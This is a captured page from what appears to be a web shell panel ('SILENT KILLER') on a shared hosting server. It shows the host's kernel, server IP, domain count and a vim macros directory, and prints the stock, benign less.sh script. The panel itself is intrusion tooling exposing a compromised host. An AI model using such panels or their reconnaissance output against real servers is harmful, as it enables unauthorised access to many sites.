SILENT KILLERPanel

Current Path: > > usr > share > vim > vim80 > macros


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //usr/share/vim/vim80/macros

NameTypeSizeLast ModifiedActions
hanoi Directory - -
life Directory - -
maze Directory - -
urm Directory - -
README.txt File 1120 bytes August 02 2022 16:56:59.
editexisting.vim File 124 bytes August 02 2022 16:56:59.
justify.vim File 109 bytes August 02 2022 16:56:59.
less.bat File 288 bytes August 02 2022 16:56:59.
less.sh File 588 bytes August 02 2022 16:56:59.
less.vim File 5567 bytes August 02 2022 16:56:59.
matchit.vim File 124 bytes August 02 2022 16:56:59.
shellmenu.vim File 115 bytes August 02 2022 16:56:59.
swapmous.vim File 114 bytes August 02 2022 16:56:59.

Reading File: //usr/share/vim/vim80/macros/less.sh

#!/bin/sh
# Shell script to start Vim with less.vim.
# Read stdin if no arguments were given and stdin was redirected.

if test -t 1; then
  if test $# = 0; then
    if test -t 0; then
      echo "Missing filename" 1>&2
      exit
    fi
    vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' -
  else
    vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@"
  fi
else
  # Output is not a terminal, cat arguments or stdin
  if test $# = 0; then
    if test -t 0; then
      echo "Missing filename" 1>&2
      exit
    fi
    cat
  else
    cat "$@"
  fi
fi

SILENT KILLER Tool